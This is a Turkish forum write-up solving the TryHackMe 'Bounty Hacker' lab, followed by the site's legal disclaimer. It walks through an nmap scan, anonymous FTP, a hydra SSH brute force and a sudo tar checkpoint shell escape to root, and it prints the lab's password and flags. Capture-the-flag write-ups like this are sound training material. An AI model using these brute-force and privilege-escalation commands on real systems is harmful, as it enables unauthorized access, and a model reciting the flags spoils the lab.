THM Bounty Hacker WriteUp

PresanS

Kıdemli Üye
8 Ocak 2017
2,470
203
24
Debian
Selamun Aleyküm arkadaşlar, TryHackMe de bulunan Bounty Hacker makinasını çözeceğiz.

Her zaman olduğu gibi port taramasıyla başlayalım..

Kod:
[CENTER]  [B]Nmap -A -v 10.10.229.80[/B]
[/CENTER]
QXamT.png


4 adet portumuz varmış, ;

20 ftp-data(closed),

21 anon-ftp,

22 ssh,

80 http

80 portunu görür görmez ben web sitesine gidiyorum hemen,
indexi incelediğim de ve kaynak kodlarına baktığımda bişey bulamadım,
sırada terminali açıp ftp bağlanmak var.
Kod:
[CENTER][B]ftp 10.10.229.80[/B]
[/CENTER]
QeIDJ.png


ftp bağlandığımız da 2 adet txt dosyası olduğunu gördük,
bilgisayarımıza indirelim .

Kod:
[CENTER][B]mget *[/B]
[/CENTER]
diyerek ftp içerisindeki tüm dosyaların bilgisayarımıza indirmesini istiyoruz.

task.txt içeriğine baktığımız da ilk sorumuzun cevabını bulmuş olduk.
Kod:
[CENTER][B]Who wrote the task list? : lin[/B]
[/CENTER]
locks.txt nin içerisinde ne olduğuna bakınalım..

QemZb.png


bir sonraki soruda bu liste ile nerede Brute Force(Deneme-yanılma) yapabileceğimizi soruyor,portlara baktığımız da ssh portu görüyoruz burada yapabileceğimizi düşünerek ssh deniyoruz ve cevap bu evet.

Kod:
[CENTER][B]What service can you bruteforce with the text file found? : ssh[/B]
[/CENTER]
ssh portuna bağlanabilmek için elimizde kullanıcı adı ve bir password listesi var, şimdi hydra toolu ile bf yaparak şifreyi öğrenmeye çalışıyoruz.

Kod:
[CENTER][B]hydra -l lin -p locks.txt ssh://10.10.229.80[/B]
[/CENTER]
QeGXq.png


Kod:
[CENTER][B]What is the users password? : RedDr4gonSynd1cat3[/B]
[/CENTER]
Şifremizide bulduğumuza göre bakalım ssh da neler varmış;

Kod:
[CENTER][B]ssh [email protected][/B]
[/CENTER]
Qe7Xy.png


user txt içerisinde flagı istiyordu bizden,

Kod:
[CENTER][B]user.txt : THM{CR1M3_SyNd1C4T3}[/B][/CENTER]
sıra geldi root.txt flagına,

QeiPE.png



önce hangi dizinde olduğuma baktım, sonra kök dizinine gittim. ve root dizinine gitmek istediğimde root olmadığım için Permission denied hatası aldım.



7-15.png




yetkimizi yükseltmemiz lazım,
burada ilk olarak hangi programı kullandığımı öğrenmek istedim


Kod:
[CENTER][B]sudo -l[/B]
[/CENTER]
şifreli bir şekilde root yetkisinde tar diye bir programı kullandığımı gördüm,
bunun için ise suid yetkileri içeren


Kod:
[CENTER] [B]https://gtfobins.github.io/[/B]
[/CENTER]
göz gezdirdim ve bunu buldum,


Kod:
[CENTER][B]sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh[/B]
[/CENTER]
şifreyi girip whoami ye tekrar baktığım da root olduğumu gördüm,
root dizinine gidip root.txt okuyarak son sorumuzu da cevaplamış olduk.


Kod:
[CENTER][B]root.txt : THM{80UN7Y_h4cK3r} [/B]
[/CENTER]






 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.